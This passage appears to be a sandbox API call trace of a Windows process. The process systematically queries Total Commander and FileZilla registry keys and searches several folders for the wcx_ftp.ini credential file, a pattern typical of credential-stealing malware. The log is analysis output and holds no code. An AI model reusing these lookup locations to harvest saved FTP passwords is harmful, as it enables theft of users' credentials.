[0591.008] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Ghisler\\Total Commander", ulOptions=0x0, samDesired=0x20019, phkResult=0x52e2dc | out: phkResult=0x52e2dc*=0x0) returned 0x2 [0591.008] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Ghisler\\Total Commander", ulOptions=0x0, samDesired=0x20219, phkResult=0x52e2b0 | out: phkResult=0x52e2b0*=0x0) returned 0x2 [0591.008] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Ghisler\\Total Commander", ulOptions=0x0, samDesired=0x20119, phkResult=0x52e284 | out: phkResult=0x52e284*=0x0) returned 0x2 [0591.008] lstrlenW (lpString="wcx_ftp.ini") returned 11 [0591.008] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\VirtualStore\\Windows\\") returned 53 [0591.008] LocalAlloc (uFlags=0x40, uBytes=0x102) returned 0x5ed570 [0591.008] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\VirtualStore\\Windows\\wcx_ftp.ini" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\virtualstore\\windows\\wcx_ftp.ini"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0591.008] LocalFree (hMem=0x5ed570) returned 0x0 [0591.008] LocalFree (hMem=0x5e6f98) returned 0x0 [0591.008] LocalAlloc (uFlags=0x40, uBytes=0x28a) returned 0x63f8c8 [0591.008] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x63f8c8 | out: pszPath="C:\\Users\\aETAdzjz") returned 0x0 [0591.008] lstrlenW (lpString="C:\\Users\\aETAdzjz") returned 17 [0591.008] lstrlenW (lpString="\\") returned 1 [0591.008] lstrlenW (lpString="C:\\Users\\aETAdzjz") returned 17 [0591.008] LocalAlloc (uFlags=0x40, uBytes=0xa6) returned 0x5d3958 [0591.008] LocalFree (hMem=0x63f8c8) returned 0x0 [0591.008] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Ghisler\\Windows Commander", ulOptions=0x0, samDesired=0x20019, phkResult=0x52e2f0 | out: phkResult=0x52e2f0*=0x0) returned 0x2 [0591.008] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Ghisler\\Windows Commander", ulOptions=0x0, samDesired=0x20219, phkResult=0x52e2c4 | out: phkResult=0x52e2c4*=0x0) returned 0x2 [0591.009] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Ghisler\\Windows Commander", ulOptions=0x0, samDesired=0x20119, phkResult=0x52e298 | out: phkResult=0x52e298*=0x0) returned 0x2 [0591.009] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Ghisler\\Total Commander", ulOptions=0x0, samDesired=0x20019, phkResult=0x52e2f0 | out: phkResult=0x52e2f0*=0x0) returned 0x2 [0591.009] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Ghisler\\Total Commander", ulOptions=0x0, samDesired=0x20219, phkResult=0x52e2c4 | out: phkResult=0x52e2c4*=0x0) returned 0x2 [0591.009] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Ghisler\\Total Commander", ulOptions=0x0, samDesired=0x20119, phkResult=0x52e298 | out: phkResult=0x52e298*=0x0) returned 0x2 [0591.009] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Ghisler\\Windows Commander", ulOptions=0x0, samDesired=0x20019, phkResult=0x52e2e4 | out: phkResult=0x52e2e4*=0x0) returned 0x2 [0591.009] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Ghisler\\Windows Commander", ulOptions=0x0, samDesired=0x20219, phkResult=0x52e2b8 | out: phkResult=0x52e2b8*=0x0) returned 0x2 [0591.009] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Ghisler\\Windows Commander", ulOptions=0x0, samDesired=0x20119, phkResult=0x52e28c | out: phkResult=0x52e28c*=0x0) returned 0x2 [0591.009] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Ghisler\\Total Commander", ulOptions=0x0, samDesired=0x20019, phkResult=0x52e2e4 | out: phkResult=0x52e2e4*=0x0) returned 0x2 [0591.009] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Ghisler\\Total Commander", ulOptions=0x0, samDesired=0x20219, phkResult=0x52e2b8 | out: phkResult=0x52e2b8*=0x0) returned 0x2 [0591.009] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Ghisler\\Total Commander", ulOptions=0x0, samDesired=0x20119, phkResult=0x52e28c | out: phkResult=0x52e28c*=0x0) returned 0x2 [0591.009] lstrlenW (lpString="wcx_ftp.ini") returned 11 [0591.009] lstrlenW (lpString="C:\\Users\\aETAdzjz\\") returned 18 [0591.009] LocalAlloc (uFlags=0x40, uBytes=0xbc) returned 0x5b7378 [0591.009] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\wcx_ftp.ini" (normalized: "c:\\users\\aetadzjz\\wcx_ftp.ini"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0591.009] LocalFree (hMem=0x5b7378) returned 0x0 [0591.009] LocalFree (hMem=0x5d3958) returned 0x0 [0591.009] LocalAlloc (uFlags=0x40, uBytes=0x28a) returned 0x63f8c8 [0591.009] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x63f8c8 | out: pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming") returned 0x0 [0591.009] lstrlenW (lpString="\\GHISLER") returned 8 [0591.009] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming") returned 33 [0591.009] LocalAlloc (uFlags=0x40, uBytes=0xd4) returned 0x2ed5060 [0591.009] LocalFree (hMem=0x63f8c8) returned 0x0 [0591.009] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\GHISLER") returned 41 [0591.009] lstrlenW (lpString="\\") returned 1 [0591.009] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\GHISLER") returned 41 [0591.009] LocalAlloc (uFlags=0x40, uBytes=0xd6) returned 0x2ed5140 [0591.009] LocalFree (hMem=0x2ed5060) returned 0x0 [0591.009] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Ghisler\\Windows Commander", ulOptions=0x0, samDesired=0x20019, phkResult=0x52e2ec | out: phkResult=0x52e2ec*=0x0) returned 0x2 [0591.010] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Ghisler\\Windows Commander", ulOptions=0x0, samDesired=0x20219, phkResult=0x52e2c0 | out: phkResult=0x52e2c0*=0x0) returned 0x2 [0591.010] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Ghisler\\Windows Commander", ulOptions=0x0, samDesired=0x20119, phkResult=0x52e294 | out: phkResult=0x52e294*=0x0) returned 0x2 [0591.010] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Ghisler\\Total Commander", ulOptions=0x0, samDesired=0x20019, phkResult=0x52e2ec | out: phkResult=0x52e2ec*=0x0) returned 0x2 [0591.010] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Ghisler\\Total Commander", ulOptions=0x0, samDesired=0x20219, phkResult=0x52e2c0 | out: phkResult=0x52e2c0*=0x0) returned 0x2 [0591.010] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Ghisler\\Total Commander", ulOptions=0x0, samDesired=0x20119, phkResult=0x52e294 | out: phkResult=0x52e294*=0x0) returned 0x2 [0591.010] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Ghisler\\Windows Commander", ulOptions=0x0, samDesired=0x20019, phkResult=0x52e2e0 | out: phkResult=0x52e2e0*=0x0) returned 0x2 [0591.010] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Ghisler\\Windows Commander", ulOptions=0x0, samDesired=0x20219, phkResult=0x52e2b4 | out: phkResult=0x52e2b4*=0x0) returned 0x2 [0591.010] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Ghisler\\Windows Commander", ulOptions=0x0, samDesired=0x20119, phkResult=0x52e288 | out: phkResult=0x52e288*=0x0) returned 0x2 [0591.010] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Ghisler\\Total Commander", ulOptions=0x0, samDesired=0x20019, phkResult=0x52e2e0 | out: phkResult=0x52e2e0*=0x0) returned 0x2 [0591.010] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Ghisler\\Total Commander", ulOptions=0x0, samDesired=0x20219, phkResult=0x52e2b4 | out: phkResult=0x52e2b4*=0x0) returned 0x2 [0591.010] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Ghisler\\Total Commander", ulOptions=0x0, samDesired=0x20119, phkResult=0x52e288 | out: phkResult=0x52e288*=0x0) returned 0x2 [0591.010] lstrlenW (lpString="wcx_ftp.ini") returned 11 [0591.010] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\GHISLER\\") returned 42 [0591.010] LocalAlloc (uFlags=0x40, uBytes=0xec) returned 0x5e6f98 [0591.010] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\GHISLER\\wcx_ftp.ini" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\ghisler\\wcx_ftp.ini"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0591.010] LocalFree (hMem=0x5e6f98) returned 0x0 [0591.010] LocalFree (hMem=0x2ed5140) returned 0x0 [0591.010] LocalAlloc (uFlags=0x40, uBytes=0x28a) returned 0x63f8c8 [0591.010] SHGetFolderPathW (in: hwnd=0x0, csidl=35, hToken=0x0, dwFlags=0x0, pszPath=0x63f8c8 | out: pszPath="C:\\ProgramData") returned 0x0 [0591.010] lstrlenW (lpString="\\GHISLER") returned 8 [0591.010] lstrlenW (lpString="C:\\ProgramData") returned 14 [0591.010] LocalAlloc (uFlags=0x40, uBytes=0xae) returned 0x2ed9860 [0591.010] LocalFree (hMem=0x63f8c8) returned 0x0 [0591.010] lstrlenW (lpString="C:\\ProgramData\\GHISLER") returned 22 [0591.010] lstrlenW (lpString="\\") returned 1 [0591.010] lstrlenW (lpString="C:\\ProgramData\\GHISLER") returned 22 [0591.010] LocalAlloc (uFlags=0x40, uBytes=0xb0) returned 0x2ed9918 [0591.010] LocalFree (hMem=0x2ed9860) returned 0x0 [0591.010] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Ghisler\\Windows Commander", ulOptions=0x0, samDesired=0x20019, phkResult=0x52e2ec | out: phkResult=0x52e2ec*=0x0) returned 0x2 [0591.011] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Ghisler\\Windows Commander", ulOptions=0x0, samDesired=0x20219, phkResult=0x52e2c0 | out: phkResult=0x52e2c0*=0x0) returned 0x2 [0591.011] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Ghisler\\Windows Commander", ulOptions=0x0, samDesired=0x20119, phkResult=0x52e294 | out: phkResult=0x52e294*=0x0) returned 0x2 [0591.011] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Ghisler\\Total Commander", ulOptions=0x0, samDesired=0x20019, phkResult=0x52e2ec | out: phkResult=0x52e2ec*=0x0) returned 0x2 [0591.011] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Ghisler\\Total Commander", ulOptions=0x0, samDesired=0x20219, phkResult=0x52e2c0 | out: phkResult=0x52e2c0*=0x0) returned 0x2 [0591.011] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Ghisler\\Total Commander", ulOptions=0x0, samDesired=0x20119, phkResult=0x52e294 | out: phkResult=0x52e294*=0x0) returned 0x2 [0591.011] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Ghisler\\Windows Commander", ulOptions=0x0, samDesired=0x20019, phkResult=0x52e2e0 | out: phkResult=0x52e2e0*=0x0) returned 0x2 [0591.011] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Ghisler\\Windows Commander", ulOptions=0x0, samDesired=0x20219, phkResult=0x52e2b4 | out: phkResult=0x52e2b4*=0x0) returned 0x2 [0591.011] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Ghisler\\Windows Commander", ulOptions=0x0, samDesired=0x20119, phkResult=0x52e288 | out: phkResult=0x52e288*=0x0) returned 0x2 [0591.011] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Ghisler\\Total Commander", ulOptions=0x0, samDesired=0x20019, phkResult=0x52e2e0 | out: phkResult=0x52e2e0*=0x0) returned 0x2 [0591.011] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Ghisler\\Total Commander", ulOptions=0x0, samDesired=0x20219, phkResult=0x52e2b4 | out: phkResult=0x52e2b4*=0x0) returned 0x2 [0591.011] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Ghisler\\Total Commander", ulOptions=0x0, samDesired=0x20119, phkResult=0x52e288 | out: phkResult=0x52e288*=0x0) returned 0x2 [0591.011] lstrlenW (lpString="wcx_ftp.ini") returned 11 [0591.011] lstrlenW (lpString="C:\\ProgramData\\GHISLER\\") returned 23 [0591.011] LocalAlloc (uFlags=0x40, uBytes=0xc6) returned 0x5d5258 [0591.011] CreateFileW (lpFileName="C:\\ProgramData\\GHISLER\\wcx_ftp.ini" (normalized: "c:\\programdata\\ghisler\\wcx_ftp.ini"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0591.011] LocalFree (hMem=0x5d5258) returned 0x0 [0591.011] LocalFree (hMem=0x2ed9918) returned 0x0 [0591.011] LocalAlloc (uFlags=0x40, uBytes=0x28a) returned 0x63f8c8 [0591.011] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x63f8c8 | out: pszPath="C:\\Users\\aETAdzjz\\AppData\\Local") returned 0x0 [0591.011] lstrlenW (lpString="\\GHISLER") returned 8 [0591.011] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local") returned 31 [0591.011] LocalAlloc (uFlags=0x40, uBytes=0xd0) returned 0x5977a0 [0591.011] LocalFree (hMem=0x63f8c8) returned 0x0 [0591.011] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\GHISLER") returned 39 [0591.011] lstrlenW (lpString="\\") returned 1 [0591.011] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\GHISLER") returned 39 [0591.011] LocalAlloc (uFlags=0x40, uBytes=0xd2) returned 0x2ed5140 [0591.011] LocalFree (hMem=0x5977a0) returned 0x0 [0591.012] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Ghisler\\Windows Commander", ulOptions=0x0, samDesired=0x20019, phkResult=0x52e2ec | out: phkResult=0x52e2ec*=0x0) returned 0x2 [0591.012] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Ghisler\\Windows Commander", ulOptions=0x0, samDesired=0x20219, phkResult=0x52e2c0 | out: phkResult=0x52e2c0*=0x0) returned 0x2 [0591.012] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Ghisler\\Windows Commander", ulOptions=0x0, samDesired=0x20119, phkResult=0x52e294 | out: phkResult=0x52e294*=0x0) returned 0x2 [0591.012] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Ghisler\\Total Commander", ulOptions=0x0, samDesired=0x20019, phkResult=0x52e2ec | out: phkResult=0x52e2ec*=0x0) returned 0x2 [0591.012] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Ghisler\\Total Commander", ulOptions=0x0, samDesired=0x20219, phkResult=0x52e2c0 | out: phkResult=0x52e2c0*=0x0) returned 0x2 [0591.012] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Ghisler\\Total Commander", ulOptions=0x0, samDesired=0x20119, phkResult=0x52e294 | out: phkResult=0x52e294*=0x0) returned 0x2 [0591.012] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Ghisler\\Windows Commander", ulOptions=0x0, samDesired=0x20019, phkResult=0x52e2e0 | out: phkResult=0x52e2e0*=0x0) returned 0x2 [0591.012] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Ghisler\\Windows Commander", ulOptions=0x0, samDesired=0x20219, phkResult=0x52e2b4 | out: phkResult=0x52e2b4*=0x0) returned 0x2 [0591.012] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Ghisler\\Windows Commander", ulOptions=0x0, samDesired=0x20119, phkResult=0x52e288 | out: phkResult=0x52e288*=0x0) returned 0x2 [0591.012] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Ghisler\\Total Commander", ulOptions=0x0, samDesired=0x20019, phkResult=0x52e2e0 | out: phkResult=0x52e2e0*=0x0) returned 0x2 [0591.012] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Ghisler\\Total Commander", ulOptions=0x0, samDesired=0x20219, phkResult=0x52e2b4 | out: phkResult=0x52e2b4*=0x0) returned 0x2 [0591.012] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Ghisler\\Total Commander", ulOptions=0x0, samDesired=0x20119, phkResult=0x52e288 | out: phkResult=0x52e288*=0x0) returned 0x2 [0591.012] lstrlenW (lpString="wcx_ftp.ini") returned 11 [0591.012] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\GHISLER\\") returned 40 [0591.012] LocalAlloc (uFlags=0x40, uBytes=0xe8) returned 0x2ed2ab0 [0591.012] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\GHISLER\\wcx_ftp.ini" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\ghisler\\wcx_ftp.ini"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0591.012] LocalFree (hMem=0x2ed2ab0) returned 0x0 [0591.012] LocalFree (hMem=0x2ed5140) returned 0x0 [0591.012] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Ghisler\\Windows Commander", ulOptions=0x0, samDesired=0x20019, phkResult=0x52e310 | out: phkResult=0x52e310*=0x0) returned 0x2 [0591.012] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Ghisler\\Windows Commander", ulOptions=0x0, samDesired=0x20219, phkResult=0x52e2e4 | out: phkResult=0x52e2e4*=0x0) returned 0x2 [0591.012] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Ghisler\\Windows Commander", ulOptions=0x0, samDesired=0x20119, phkResult=0x52e2b8 | out: phkResult=0x52e2b8*=0x0) returned 0x2 [0591.013] LocalAlloc (uFlags=0x40, uBytes=0x28a) returned 0x63f8c8 [0591.013] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x63f8c8 | out: pszPath="C:\\Users\\aETAdzjz\\AppData\\Local") returned 0x0 [0591.013] lstrlenW (lpString="\\VirtualStore") returned 13 [0591.013] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local") returned 31 [0591.013] LocalAlloc (uFlags=0x40, uBytes=0xda) returned 0x2ed0060 [0591.013] LocalFree (hMem=0x63f8c8) returned 0x0 [0591.013] StrStrIW (lpFirst=0x0, lpSrch="\\") returned 0x0 [0591.013] LocalFree (hMem=0x2ed0060) returned 0x0 [0591.013] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Ghisler\\Total Commander", ulOptions=0x0, samDesired=0x20019, phkResult=0x52e2e8 | out: phkResult=0x52e2e8*=0x0) returned 0x2 [0591.013] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Ghisler\\Total Commander", ulOptions=0x0, samDesired=0x20219, phkResult=0x52e2bc | out: phkResult=0x52e2bc*=0x0) returned 0x2 [0591.013] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Ghisler\\Total Commander", ulOptions=0x0, samDesired=0x20119, phkResult=0x52e290 | out: phkResult=0x52e290*=0x0) returned 0x2 [0591.013] LocalAlloc (uFlags=0x40, uBytes=0x28a) returned 0x63f8c8 [0591.013] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x63f8c8 | out: pszPath="C:\\Users\\aETAdzjz\\AppData\\Local") returned 0x0 [0591.013] lstrlenW (lpString="\\VirtualStore") returned 13 [0591.013] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local") returned 31 [0591.013] LocalAlloc (uFlags=0x40, uBytes=0xda) returned 0x2ed0060 [0591.013] LocalFree (hMem=0x63f8c8) returned 0x0 [0591.013] StrStrIW (lpFirst=0x0, lpSrch="\\") returned 0x0 [0591.013] LocalFree (hMem=0x2ed0060) returned 0x0 [0591.013] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Ghisler\\Windows Commander", ulOptions=0x0, samDesired=0x20019, phkResult=0x52e308 | out: phkResult=0x52e308*=0x0) returned 0x2 [0591.013] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Ghisler\\Windows Commander", ulOptions=0x0, samDesired=0x20219, phkResult=0x52e2dc | out: phkResult=0x52e2dc*=0x0) returned 0x2 [0591.013] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Ghisler\\Windows Commander", ulOptions=0x0, samDesired=0x20119, phkResult=0x52e2b0 | out: phkResult=0x52e2b0*=0x0) returned 0x2 [0591.013] LocalAlloc (uFlags=0x40, uBytes=0x28a) returned 0x63f8c8 [0591.013] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x63f8c8 | out: pszPath="C:\\Users\\aETAdzjz\\AppData\\Local") returned 0x0 [0591.014] lstrlenW (lpString="\\VirtualStore") returned 13 [0591.014] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local") returned 31 [0591.014] LocalAlloc (uFlags=0x40, uBytes=0xda) returned 0x2ed0060 [0591.014] LocalFree (hMem=0x63f8c8) returned 0x0 [0591.014] StrStrIW (lpFirst=0x0, lpSrch="\\") returned 0x0 [0591.014] LocalFree (hMem=0x2ed0060) returned 0x0 [0591.014] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Ghisler\\Total Commander", ulOptions=0x0, samDesired=0x20019, phkResult=0x52e2e0 | out: phkResult=0x52e2e0*=0x0) returned 0x2 [0591.014] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Ghisler\\Total Commander", ulOptions=0x0, samDesired=0x20219, phkResult=0x52e2b4 | out: phkResult=0x52e2b4*=0x0) returned 0x2 [0591.014] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Ghisler\\Total Commander", ulOptions=0x0, samDesired=0x20119, phkResult=0x52e288 | out: phkResult=0x52e288*=0x0) returned 0x2 [0591.014] LocalAlloc (uFlags=0x40, uBytes=0x28a) returned 0x63f8c8 [0591.014] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x63f8c8 | out: pszPath="C:\\Users\\aETAdzjz\\AppData\\Local") returned 0x0 [0591.014] lstrlenW (lpString="\\VirtualStore") returned 13 [0591.014] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local") returned 31 [0591.014] LocalAlloc (uFlags=0x40, uBytes=0xda) returned 0x2ed0060 [0591.014] LocalFree (hMem=0x63f8c8) returned 0x0 [0591.014] StrStrIW (lpFirst=0x0, lpSrch="\\") returned 0x0 [0591.014] LocalFree (hMem=0x2ed0060) returned 0x0 [0591.014] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Ghisler\\Windows Commander", ulOptions=0x0, samDesired=0x20019, phkResult=0x52e2f8 | out: phkResult=0x52e2f8*=0x0) returned 0x2 [0591.014] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Ghisler\\Windows Commander", ulOptions=0x0, samDesired=0x20219, phkResult=0x52e2cc | out: phkResult=0x52e2cc*=0x0) returned 0x2 [0591.014] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Ghisler\\Windows Commander", ulOptions=0x0, samDesired=0x20119, phkResult=0x52e2a0 | out: phkResult=0x52e2a0*=0x0) returned 0x2 [0591.014] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Ghisler\\Total Commander", ulOptions=0x0, samDesired=0x20019, phkResult=0x52e2f8 | out: phkResult=0x52e2f8*=0x0) returned 0x2 [0591.014] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Ghisler\\Total Commander", ulOptions=0x0, samDesired=0x20219, phkResult=0x52e2cc | out: phkResult=0x52e2cc*=0x0) returned 0x2 [0591.014] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Ghisler\\Total Commander", ulOptions=0x0, samDesired=0x20119, phkResult=0x52e2a0 | out: phkResult=0x52e2a0*=0x0) returned 0x2 [0591.014] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Ghisler\\Windows Commander", ulOptions=0x0, samDesired=0x20019, phkResult=0x52e2ec | out: phkResult=0x52e2ec*=0x0) returned 0x2 [0591.014] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Ghisler\\Windows Commander", ulOptions=0x0, samDesired=0x20219, phkResult=0x52e2c0 | out: phkResult=0x52e2c0*=0x0) returned 0x2 [0591.014] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Ghisler\\Windows Commander", ulOptions=0x0, samDesired=0x20119, phkResult=0x52e294 | out: phkResult=0x52e294*=0x0) returned 0x2 [0591.015] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Ghisler\\Total Commander", ulOptions=0x0, samDesired=0x20019, phkResult=0x52e2ec | out: phkResult=0x52e2ec*=0x0) returned 0x2 [0591.015] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Ghisler\\Total Commander", ulOptions=0x0, samDesired=0x20219, phkResult=0x52e2c0 | out: phkResult=0x52e2c0*=0x0) returned 0x2 [0591.015] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Ghisler\\Total Commander", ulOptions=0x0, samDesired=0x20119, phkResult=0x52e294 | out: phkResult=0x52e294*=0x0) returned 0x2 [0591.015] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\FileZilla", ulOptions=0x0, samDesired=0x20019, phkResult=0x52d2b4 | out: phkResult=0x52d2b4*=0x0) returned 0x2 [0591.015] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\FileZilla", ulOptions=0x0, samDesired=0x20219, phkResult=0x52d288 | out: phkResult=0x52d288*=0x0) returned 0x2 [0591.015] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\FileZilla", ulOptions=0x0, samDesired=0x20119, phkResult=0x52d25c | out: phkResult=0x52d25c*=0x0) returned 0x2 [0591.015] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\FileZilla", ulOptions=0x0, samDesired=0x20019, phkResult=0x52d2a4 | out: phkResult=0x52d2a4*=0x0) returned 0x2 [0591.015] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\FileZilla", ulOptions=0x0, samDesired=0x20219, phkResult=0x52d278 | out: phkResult=0x52d278*=0x0) returned 0x2 [0591.015] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\FileZilla", ulOptions=0x0, samDesired=0x20119, phkResult=0x52d24c | out: phkResult=0x52d24c*=0x0) returned 0x2 [0591.015] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\FileZilla", ulOptions=0x0, samDesired=0x20019, phkResult=0x52d294 | out: phkResult=0x52d294*=0x0) returned 0x2 [0591.015] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\FileZilla", ulOptions=0x0, samDesired=0x20219, phkResult=0x52d268 | out: phkResult=0x52d268*=0x0) returned 0x2 [0591.015] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\FileZilla", ulOptions=0x0, samDesired=0x20119, phkResult=0x52d23c | out: phkResult=0x52d23c*=0x0) returned 0x2 [0591.015] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\FileZilla", ulOptions=0x0, samDesired=0x20019, phkResult=0x52d284 | out: phkResult=0x52d284*=0x0) returned 0x2 [0591.015] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\FileZilla", ulOptions=0x0, samDesired=0x20219, phkResult=0x52d258 | out: phkResult=0x52d258*=0x0) returned 0x2 [0591.015] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\FileZilla", ulOptions=0x0, samDesired=0x20119, phkResult=0x52d22c | out: phkResult=0x52d22c*=0x0) returned 0x2 [0591.015] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\FileZilla", ulOptions=0x0, samDesired=0x20019, phkResult=0x52d290 | out: 